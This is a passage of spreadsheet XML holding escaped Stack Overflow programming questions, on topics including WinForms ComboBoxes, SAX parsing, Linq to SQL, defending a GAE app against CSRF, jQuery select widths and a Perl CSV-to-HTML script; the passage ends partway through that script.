    <t xml:space="preserve">&lt;p&gt;I can't seem to find an easy to use, .net native way to get Comboboxes on .net winforms to display one value and return another based on the selection without creating my own helper class, with the knowledge that winforms is going to display the ToString method on the object that you put in it.&lt;/p&gt;
&lt;p&gt;This is how I'm doing it now, very generically. First, create the helper class.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Public Class ListItem
     Public Value As Object
     Public DisplayString As String
     Public Sub New(ByVal NewValue As Object, ByVal NewDisplayString As String)
         Value = NewValue
         DisplayString = NewDisplayString
     End Sub
     Public Overrides Function ToString() As String
         Return DisplayString
     End Function
 End Class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;then, to load the combobox from a collection or whatever.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    For Each o as WhateverObject In CollectionIwantToaddItemsFrom
        li = New ListItem(o.ValueToReturn, o.ValueToDisplay)
        Me.ComboBox1.Items.Add(li)
    Next
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and finally, to use the object&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub ComboBox1_SelectedIndexChanged(ByVal sender As Object, ByVal e As EventArgs) Handles ComboBox1.SelectedIndexChanged
if me.combobox1.selecteditem is nothing then exit sub
Dim li As ListItem = me.ComboBox1.SelectedItem
Dim o as object = li.value 
'do stuff with o.
end sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm sure there is something I'm better to use in the framework that I'm over looking.  What is it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there problems with rendering WPF over Remote Desktop under Windows XP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have heard that WPF primitives will not be supported by remote desktop on windows XP.  The implication of this is that if you run a WPF application on a vista machine and display it on an XP machine (via remote desktop) the display will be sent as a compressed bitmap.&lt;/p&gt;
&lt;p&gt;This issue is resolved in Vista-Vista comunication via DirectX 11 (?) but this will not be made available on XP.  There is obviously a performance hit here,  I would like to understand it before making any inroads into developing applications to WPF.&lt;/p&gt;
&lt;p&gt;Some information on this topic can be found here:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://blogs.msdn.com/tims/archive/2007/01/05/comparing-wpf-on-windows-vista-v-windows-xp.aspx"&gt;http://blogs.msdn.com/tims/archive/2007/01/05/comparing-wpf-on-windows-vista-v-windows-xp.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;See comment from the above link (quote):&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;To SpongeJim's question, this is done by the MIL (media integration layer), which is the underlying core of WPF that handles composition. On a Vista/Vista remote desktop connection, the MIL primitives are remoted and then reconstituted. On other combinations (e.g. 2003/XP), what gets remoted is bitmaps, which is obviously far more bandwidth-intensive. More depth on this topic can be found on Greg Schechter's blog, and in this entry in particular: &lt;a href="http://blogs.msdn.com/greg_schechter/archive/2006/06/09/623566.aspx"&gt;http://blogs.msdn.com/greg_schechter/archive/2006/06/09/623566.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Does anyone have any experience or more up to date information on this issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Parsing "Event XML" in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to use Java to parse an ongoing stream of event drive XML generated by a remote device.  Here's a simplified sample of two events:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0"?&amp;gt;
&amp;lt;Event&amp;gt; DeviceEventMsg
&amp;lt;Param1&amp;gt;SomeParmValue&amp;lt;/Param1&amp;gt;
&amp;lt;/Event&amp;gt;
&amp;lt;?xml version="1.0"?&amp;gt;
&amp;lt;Event&amp;gt; DeviceEventMsg
&amp;lt;Param1&amp;gt;SomeParmValue&amp;lt;/Param1&amp;gt;
&amp;lt;/Event&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems like SAX is more suited to this than DOM because it is an ongoing stream, though I'm not as familiar with Sax.  Don't yell at me for the structure of the XML - I know it already and can't change it.  &lt;/p&gt;
&lt;p&gt;And yes the device DOES send the xml directive before every event.  My first problem is that the second xml processing instruction is croaking the SAX parser.  &lt;/p&gt;
&lt;p&gt;Can anyone suggest a way to get around that?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;The code I'm using so far which is croaking on the second xml processing instruction is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class TestMe extends HandlerBase {
    public void startDocument () throws SAXException
    {
        System.out.println("got startDocument");
    }
    public void endDocument () throws SAXException
    {
        System.out.println("got endDocument");
    }
    public void startElement (String name, AttributeList attrs) throws SAXException
    {
        System.out.println("got startElement");
    }
    public void endElement (String name) throws SAXException
    {
        System.out.println("got endElement");
    }
    public void characters (char buf [], int offset, int len) throws SAXException
    {
        System.out.println("found characters");
    }
    public void processingInstruction (String target, String data) throws SAXException
    {
        System.out.println("got processingInstruction");
    } 
    public static void main(String[] args) {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        try {
            SAXParser saxParser = factory.newSAXParser();
            // using a file as test input for now
            saxParser.parse( new File("devmodule.xml"), new TestMe() );
        } catch (Throwable err) {
            err.printStackTrace ();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Linq to SQL class lifespan</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As far as I can understand, when I new up a &lt;em&gt;Linq to SQL class&lt;/em&gt;, it is the equivalent of new'ing up a &lt;em&gt;SqlConnection object&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Suppose I have an object with two methods: &lt;code&gt;Delete()&lt;/code&gt; and &lt;code&gt;SubmitChanges()&lt;/code&gt;. Would it be wise of me to new up the &lt;em&gt;Linq to SQL class&lt;/em&gt; in each of the methods, or would a private variable holding the &lt;em&gt;Linq to SQL class&lt;/em&gt; - new'ed up by the constructor - be the way to go?&lt;/p&gt;
&lt;p&gt;What I'm trying to avoid is a time-out.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace Madtastic
{
    public class Comment
    {
        private Boolean _isDirty = false;
        private Int32 _id = 0;
        private Int32 _recipeID = 0;
        private String _value = "";
        private Madtastic.User _user = null;
        public Int32 ID
        {
            get
            {
                return this._id;
            }
        }
        public String Value
        {
            get
            {
                return this._value;
            }
            set
            {
                this._isDirty = true;
                this._value = value;
            }
        }
        public Madtastic.User Owner
        {
            get
            {
                return this._user;
            }
        }
        public Comment()
        {
        }
        public Comment(Int32 commentID)
        {            
            Madtastic.DataContext mdc = new Madtastic.DataContext();
            var comment = (from c in mdc.Comments
                           where c.CommentsID == commentID
                           select c).FirstOrDefault();
            if (comment != null)
            {
                this._id = comment.CommentsID;
                this._recipeID = comment.RecipesID;
                this._value = comment.CommentsValue;
                this._user = new User(comment.UsersID);
            }
            mdc.Dispose();
        }
        public void SubmitChanges()
        {
            Madtastic.DataContext mdc = new Madtastic.DataContext();
            var comment = (from c in mdc.Comments
                           where c.CommentsID == this._id
                           select c).FirstOrDefault();
            if (comment != null &amp;amp;&amp;amp; this._isDirty)
            {
                comment.CommentsValue = this._value;
            }
            else
            {
                Madtastic.Entities.Comment c = new Madtastic.Entities.Comment();
                c.RecipesID = this._recipeID;
                c.UsersID = this._user.ID;
                c.CommentsValue = this._value;
                mdc.Comments.InsertOnSubmit(c);
            }
            mdc.SubmitChanges();
            mdc.Dispose();
        }
        public void Delete()
        {
            Madtastic.DataContext mdc = new Madtastic.DataContext();
            var comment = (from c in mdc.Comments
                           where c.CommentsID == this._id
                           select c).FirstOrDefault();
            if (comment != null)
            {
                mdc.Comments.DeleteOnSubmit(comment);
                mdc.SubmitChanges();
                this._isDirty = false;
                this._id = 0;
                this._recipeID = 0;
                this._value = "";
                this._user = null;
            }
            mdc.Dispose();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;REFACTORED CODE (according to Grank's spec):&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace Madtastic
{
    public sealed class CommentNew : IDisposable
    {
        private Madtastic.DataContext _mdc;
        private Madtastic.Entities.Comment _comment;
        private Madtastic.User _user;
        public Int32 ID
        {
            get
            {
                return this._comment.CommentsID;
            }
        }
        public String Value
        {
            get
            {
                return this._comment.CommentsValue;
            }
            set
            {
                this._comment.CommentsValue = value;
            }
        }
        public Madtastic.User Owner
        {
            get
            {
                return this._user;
            }
        }
        public void Comment(Int32 commentID)
        {
            this._mdc = new Madtastic.DataContext();
            this._comment = (from c in _mdc.Comments
                             where c.CommentsID == commentID
                             select c).FirstOrDefault();
            if (this._comment == null)
            {
                this._comment = new Madtastic.Entities.Comment();
                this._mdc.Comments.InsertOnSubmit(this._comment);
            }
            else
            {
                this._user = new Madtastic.User(this._comment.User.UsersID);
            }
        }
        public void SubmitChanges()
        {
            this._mdc.SubmitChanges();
        }
        public void Delete()
        {
            this._mdc.Comments.DeleteOnSubmit(this._comment);
            this.SubmitChanges();
        }
        void IDisposable.Dispose()
        {
            this._mdc.Dispose();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Silverlight Hosted in Winforms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to host a silverlight control in winforms via a winforms browser, but for it to work I need some way for the forms to talk to the silverlight, and also the other way around.  Would it be possible to somehow have the two interact with each other using JavaScript as a middleman?  I.e., have the form speak to the browser's javascript, and have that speak to the silverlight control?  Is there a better way?  Or even a way at all?    (other than compiling the code as silverlight and wpf)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get a random number in Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I generate a random number between &lt;code&gt;0&lt;/code&gt; and &lt;code&gt;n&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to best prevent CSRF attacks in a GAE app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, what is the best way to prevent an XSRF attack for a GAE application?  Imagine the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Anyone can see a user's public object, and the db.Model id is used in the request to figure out which object to show.  Malicious user now has the id.&lt;/li&gt;
&lt;li&gt;Malicious user creates their own object and checks out the delete form.  They now know how to delete an object with a certain id.&lt;/li&gt;
&lt;li&gt;Malicious user gets innocent user to submit a delete request for that user's object.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What steps can I add to prevent #3?  Note that when I say ID, I am using the actual ID part of the key.  One idea I had was to use the full key value in delete requests, but would that prevent a malicious user from being able to figure this out?  As far as I know, the key is some combination of the model class type, the app id, and the object instance id, so they could probably derive the key from the id if they wanted to.&lt;/p&gt;
&lt;p&gt;Any other ideas?  Jeff wrote &lt;a href="http://www.codinghorror.com/blog/archives/001171.html"&gt;a post about this&lt;/a&gt;, and suggested a couple methods - a hidden form value that would change on each request, and a cookie value written via js to the form.  I won't want to exclude non-javascript users, so the cookie solution is no good - for the hidden form value, I would have to do a datastore write on every request that displayed a deletable object - not an ideal situation for a scalable app!&lt;/p&gt;
&lt;p&gt;Any other ideas out there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are optimal settings for Recycling of Application Pools in IIS7 in shared environment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are optimal settings for Recycling of Application Pools in IIS7 in a shared environment?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/RNQo8.png" alt="enter image description here"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multiple Data Tables in PHP/MySQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In asp.net, you can retrieve MULTIPLE datatables from a single call to the database.  Can you do the same thing in php?&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$sql ="select * from t1; select * from t2;";
$result = SomeQueryFunc($sql);
print_r($result[0]); // dump results for t1
print_r($result[1]); // dump results for t2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can you do something like this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JQuery Select Box and Loop Help</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Thanks for reading. I'm a bit new to jQuery, and am trying to make a script I can include in all my websites to solve a problem that always drives me crazy...&lt;/p&gt;
&lt;p&gt;The problem:
Select boxes with long options get cut off in Internet Explorer. For example, these select boxes:
&lt;a href="http://discoverfire.com/test/select.php"&gt;http://discoverfire.com/test/select.php&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In Firefox they are fine, but in IE, the options are cut off to the width of the select when they drop down.&lt;/p&gt;
&lt;p&gt;The solution:
What I am looking to do, is create a script that I can include in any page that will do the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Loop through all the selects on the page.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;For each select:
A. Loop through its options.
B. Find the width of the longest option.
C. Bind a function to expand the select to that width on focus (or maybe click...).
D. Bind a function to shrink to it's original width on blur.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I've managed to do most of step #2 for one select box.&lt;/p&gt;
&lt;p&gt;I found that getting the options width was a problem (especially in IE), so I looped through and copied the text of each option to a span, measured the span width, and used the longest one as the width the select will be expanded to. Perhaps somebody has a better idea.&lt;/p&gt;
&lt;p&gt;Here is the code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type='text/javascript'&amp;gt;
      $(function() {
         /*
         This function will:
            1. Create a data store for the select called ResizeToWidth.
            2. Populate it with the width of the longest option, as approximated by span width.
         The data store can then be used
         */
         // Make a temporary span to hold the text of the options.
         $('body').append("&amp;lt;span id='CurrentOptWidth'&amp;gt;&amp;lt;/span&amp;gt;");
         $("#TheSelect option").each(function(i){
            // If this is the first time through, zero out ResizeToWidth (or it will end up NaN).
            if ( isNaN( $(this).parent().data('ResizeToWidth') ) ) {
               $(this).parent().data( 'OriginalWidth', $(this).parent().width() );
               $(this).parent().data('ResizeToWidth', 0);
               $('CurrentOptWidth').css('font-family', $(this).css('font-family') );
               $('CurrentOptWidth').css('font-size', $(this).css('font-size') );
               $('CurrentOptWidth').css('font-weight', $(this).css('font-weight') );
            }
            // Put the text of the current option into the span.
            $('#CurrentOptWidth').text( $(this).text() );
            // Set ResizeToWidth to the longer of a) the current opt width, or b) itself. 
            //So it will hold the width of the longest option when we are done
            ResizeToWidth = Math.max( $('#CurrentOptWidth').width() , $(this).parent().data('ResizeToWidth') );
            // Update parent ResizeToWidth data.
            $(this).parent().data('ResizeToWidth', ResizeToWidth)
          });
         // Remove the temporary span.
         $('#CurrentOptWidth').remove();
         $('#TheSelect').focus(function(){
            $(this).width( $(this).data('ResizeToWidth') );
         });
         $('#TheSelect').blur(function(){
            $(this).width( $(this).data('OriginalWidth') );
         });
           alert( $('#TheSelect').data('OriginalWidth') );
           alert( $('#TheSelect').data('ResizeToWidth') );
      });
   &amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the select:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;select id='TheSelect' style='width:50px;'&amp;gt;
   &amp;lt;option value='1'&amp;gt;One&amp;lt;/option&amp;gt;
   &amp;lt;option value='2'&amp;gt;Two&amp;lt;/option&amp;gt;
   &amp;lt;option value='3'&amp;gt;Three&amp;lt;/option&amp;gt;
   &amp;lt;option value='42,693,748,756'&amp;gt;Forty-two billion, six-hundred and ninety-three million, seven-hundred-forty-some-odd..... &amp;lt;/option&amp;gt;
   &amp;lt;option value='5'&amp;gt;Five&amp;lt;/option&amp;gt;
   &amp;lt;option value='6'&amp;gt;Six&amp;lt;/option&amp;gt;
   &amp;lt;option value='7'&amp;gt;Seven...&amp;lt;/option&amp;gt;
&amp;lt;/select&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hopefully this will run for you if you want to run it, or you can see it in action here: &lt;a href="http://discoverfire.com/test/select.php"&gt;http://discoverfire.com/test/select.php&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What I need help with:
This needs a bit of polish, but seems to work ok if you specify the select box.&lt;/p&gt;
&lt;p&gt;However, I don't seem to be able to figure out how to apply it to all select boxes on the page with a loop. So far, I have this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('select').each(
   function(i, select){
      // Get the options for the select here... can I use select.each...?
   }
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, is there a better way to get the length of the longest option for each select? The span is close, but not very exact. The problem is that IE returns zero for the option widths of the actual selects.&lt;/p&gt;
&lt;p&gt;Any ideas are very welcome, both for the questions asked, and any other improvements to my code.&lt;/p&gt;
&lt;p&gt;Thanks!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ColdFusion web.xml?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a ColdFusion analog for the deployment descriptor/web.xml file found in a J2EE web container? I know CF is running on top of JRun and that I could just tweak the JRun dd, but what about an application-specific configuration file? Is there something like this that I'm not aware of or do you just have to roll your own?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DoubleRenderError in restful_authentication with acts_as_state_machine when activating users</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a project which uses &lt;code&gt;restful_authentication&lt;/code&gt; with &lt;code&gt;acts_as_state_machine&lt;/code&gt; and email activation, I get a double render error whenever a user does the activation action from the email link.&lt;/p&gt;
&lt;p&gt;I'm using the default&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def activate
   self.current_user = params[:activation_code].blank? ? false : User.find_by_activation_code(params[:activation_code])
   if logged_in? &amp;amp;&amp;amp; !current_user.active?
   current_user.activate!
   flash[:notice] = "Signup complete!"
   end
   redirect_back_or_default('/')
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to activate, and the default&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def redirect_back_or_default(default)
  redirect_to(session[:return_to] || default)
  session[:return_to] = nil
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to redirect. The redirect method works in every other case it's called in the same way.&lt;/p&gt;
&lt;p&gt;The double render error occurs at the render of the page main_page/home that is routed as "/".&lt;/p&gt;
&lt;p&gt;What should I be looking for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Google Maps respect the &lt;BalloonStyle&gt; definition in KML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the GGeoXml object to overlay KML on an embedded Google Map. I need to customize the popup balloon for placemarks, so I'm trying to use the &lt;a href="http://code.google.com/apis/kml/documentation/kmlreference.html#balloonstyle" rel="nofollow"&gt;&lt;code&gt;&amp;lt;BalloonStyle&amp;gt;&lt;/code&gt;&lt;/a&gt; element:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;Document xmlns="http://earth.google.com/kml/2.0"&amp;gt;
    &amp;lt;name&amp;gt;Concessions&amp;lt;/name&amp;gt;
    &amp;lt;Style id="masterPolyStyle"&amp;gt;
        ...
        &amp;lt;BalloonStyle&amp;gt;
            &amp;lt;text&amp;gt;
                &amp;lt;![CDATA[
                  &amp;lt;h6&amp;gt;Concession&amp;lt;/h6&amp;gt;
                  &amp;lt;h4&amp;gt;$[name]&amp;lt;/h4&amp;gt;
                  &amp;lt;p&amp;gt;$[description]&amp;lt;/p&amp;gt;
                ]]&amp;gt;
            &amp;lt;/text&amp;gt;
            &amp;lt;displayMode&amp;gt;default&amp;lt;/displayMode&amp;gt;
            &amp;lt;bgColor&amp;gt;DDA39B81&amp;lt;/bgColor&amp;gt;
        &amp;lt;/BalloonStyle&amp;gt;
    &amp;lt;/Style&amp;gt;
    ...
&amp;lt;/Document&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works as expected in Google Earth, but the embedded map API appears to ignore this altogether. I suppose I could just leave out the &lt;code&gt;&amp;lt;name&amp;gt;&lt;/code&gt; element altogether and just put everything in HTML inside the &lt;code&gt;&amp;lt;description&amp;gt;&lt;/code&gt; element, but I'd like to be able to take advantage of the &lt;a href="http://code.google.com/apis/kml/documentation/kmlreference.html#extendeddata" rel="nofollow"&gt;&lt;code&gt;&amp;lt;ExtendedData&amp;gt;&lt;/code&gt;&lt;/a&gt; element to display custom data in a structured way. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I add an image to my Run for a RichTextBlock?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote a small WPF app where I like to prepend text into a RichTextBox, so that the newest stuff is on top. I wrote this, and it works: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;	/// &amp;lt;summary&amp;gt;
	/// Prepends the text to the rich textbox
	/// &amp;lt;/summary&amp;gt;
	/// &amp;lt;param name="textoutput"&amp;gt;The text representing the character information.&amp;lt;/param&amp;gt;
	private void PrependSimpleText(string textoutput)
	{
		Run run = new Run(textoutput);
		Paragraph paragraph = new Paragraph(run);
		if (this.RichTextBoxOutput.Document.Blocks.Count == 0)
		{
			this.RichTextBoxOutput.Document.Blocks.Add(paragraph);
		}
		else
		{
			this.RichTextBoxOutput.Document.Blocks.InsertBefore(this.RichTextBoxOutput.Document.Blocks.FirstBlock, paragraph);
		}
	}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I would like to make a new version of that function which can add small images as well. I'm at a loss though - is it possible to add images?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to initialize a const struct without using a function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a fairly simple const struct in some C code that simply holds a few pointers and would like to initialize it statically if possible. Can I and, if so, how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to detect what .NET Framework versions and service packs are installed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A similar question was asked &lt;a href="http://stackoverflow.com/questions/198931/how-do-i-tell-if-net-35-sp1-is-installed"&gt;here&lt;/a&gt;, but it was specific to .NET 3.5. Specifically, I'm looking for the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What is the correct way to determine which .NET Framework versions and service packs are installed? &lt;/li&gt;
&lt;li&gt;Is there a list of registry keys that can be used?&lt;/li&gt;
&lt;li&gt;Are there any dependencies between Framework versions?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>How do I increase the /proc/pid/cmdline 4096 byte limit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For my Java apps with very long classpaths, I cannot see the main class specified near the end of the arg list when using ps.  I think this stems from my Ubuntu system's size limit on /proc/pid/cmdline.  How can I increase this limit?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any way to get python omnicomplete to work with non-system modules in vim?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The only thing I can get python omnicomplete to work with are system modules. I get nothing for help with modules in my site-packages or modules that I'm currently working on.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I reverse a UTF-8 string in place?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently, someone asked about an &lt;a href="http://stackoverflow.com/questions/198199/how-do-you-reverse-a-string-in-place-in-c-or-c"&gt;algorithm for reversing a string in place in C&lt;/a&gt;. Most of the proposed solutions had troubles when dealing with non single-byte strings. So, I was wondering what could be a good algorithm for dealing specifically with utf-8 strings.&lt;/p&gt;
&lt;p&gt;I came up with some code, which I'm posting as an answer, but I'd be glad to see other people's ideas or suggestions. I preferred to use actual code, so I've chosen C#, as it seems to be one of the most popular language in this site, but I don't mind if your code is in another language, as long as it could be reasonably understood by anyone who is familiar with an imperative language. And, as this is intended to see how such an algorithm could be implemented at a low-level (by low-level I just mean dealing with bytes), the idea is to avoid using libraries for the core code.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Notes:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm interested in the algorithm itself, its performance and how could it be optimized (I mean algorithm-level optimization, not replacing i++ with ++i and such; I'm not really interested in actual benchmarks either).&lt;/p&gt;
&lt;p&gt;I don't mean to actually use it in production code or "reinventing the wheel". This is just out of curiosity and as an exercise.&lt;/p&gt;
&lt;p&gt;I'm using C# byte arrays so I'm assuming you can get the length of the string without running though the string until you find a NUL.
That is, I'm not accounting for the complexity of finding the length of the string. But if you're using C, for instance, you could factor that out by using strlen() before calling the core code. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As Mike F points out, my code (and other people's code posted here) is not dealing with composite characters. Some info about those &lt;a href="http://www.unicode.org/faq/char_combmark.html"&gt;here&lt;/a&gt;. I'm not familiar with the concept, but if that means that there are "combining characters", i.e., characters / code points that are only valid in combination with other "base" characters / code points, a look-up table of such characters could be used to preserve the order of the "global" character ("base" + "combining" characters) when reversing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to embed IronPython inside my C# App?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application used by pretty tech-savey people and they want small island of programmability so I've used embedded Iron Python.&lt;/p&gt;
&lt;p&gt;However, since IronPython 2.0 Eval() doesn't work any more. Specifically I can't both load modules and inject local variables.&lt;/p&gt;
&lt;p&gt;There is a work around where I can still call Execute(), print out my answer and listen to StandardOut, but then it comes out as a string and I've lost the type.&lt;/p&gt;
&lt;p&gt;Not a disaster for a long, but a huge pain for more complex objects.&lt;/p&gt;
&lt;p&gt;Does anyone know how to get Eval() working again in 2.0 like it did in 1.x?&lt;/p&gt;
&lt;p&gt;Cheers,
Jan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Whats the main difference between int.Parse() and Convert.ToInt32</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using C#,and wanted to know the main difference between the two and which one is preferred to use while coding. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code review for VS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;looking for a good code review tool that plugs in nicely to Visual Studio.  Would be nice if it could diff from different source control providers, like Source Safe, The Vault, and/or Subversion.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I've never encountered a well written business layer. Any advice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I look around and see some great snippets of code for defining rules, validation, business objects (entities) and the like, but I have to admit to having never seen a great and well-written business layer in its entirety.&lt;/p&gt;
&lt;p&gt;I'm left knowing what I don't like, but not knowing what a great one is.&lt;/p&gt;
&lt;p&gt;Can anyone point out some good OO business layers (or great business objects) or let me know how they judge a business layer and what makes one great?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get last answer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In many symbolic math systems, such as Matlab or Mathematica, you can use a variable like &lt;code&gt;Ans&lt;/code&gt; or &lt;code&gt;%&lt;/code&gt; to retrieve the last computed value. Is there a similar facility in the Python shell?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suggestions for a Web application for a group project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am doing 2nd year computer science and we have a software engineering group project. There are 5 people in the group and we would like to build a web application in php. Please suggest some ideas for me &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you convert a C++ string to an int?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/194465/how-to-parse-a-string-to-an-int-in-c"&gt;How to parse a string to an int in C++?&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How do you convert a C++ string to an int?&lt;/p&gt;
&lt;p&gt;Assume you are expecting the string to have actual numbers in it ("1", "345", "38944", for example).&lt;/p&gt;
&lt;p&gt;Also, let's assume you don't have boost, and you really want to do it the C++ way, not the crufty old C way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert CSV into an HTML table using Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my code, I want to view all data from a CSV in table form, but it only displays the last line. How about lines 1 and 2? Here's the data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1,HF6,08-Oct-08,34:22:13,df,jhj,fh,fh,ffgh,gh,g,rt,ffgsaf,asdf,dd,yoawa,DWP,tester,Pattern
2,hf35,08-Oct-08,34:12:13,dg,jh,fh,fgh,fgh,gh,gfh,re,fsaf,asdf,dd,yokogawa,DWP,DWP,Pattern
3,hf35,08-Oct-08,31:22:03,dg,jh,fh,fgh,gh,gh,gh,rte,ffgsaf,asdf,dfffd,yokogawa,DWP,DWP,ghh
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#! /usr/bin/perl
print "Content-type:text/html\r\n\r\n";
use CGI qw(:standard);
use strict;
use warnings;
my $line;
my $file;
my ($f1,$f2,$f3,$f4,$f5,$f6,$f7,$f8,$f9,$f10,$f11,$f12,$f13,$f14,$f15,$f16,$f17,$f18,$f19);
$file='MyFile.txt';
open(F,$file)||die("Could not open $file");
while ($line=&amp;lt;F&amp;gt;)
{
($f1,$f2,$f3,$f4,$f5,$f6,$f7,$f8,$f9,$f10,$f11,$f12,$f13,$f14,$f15,$f16,$f17,$f18,$f19)= split ',',$line;
}
close(F);
print "&amp;lt;HTML&amp;gt;";
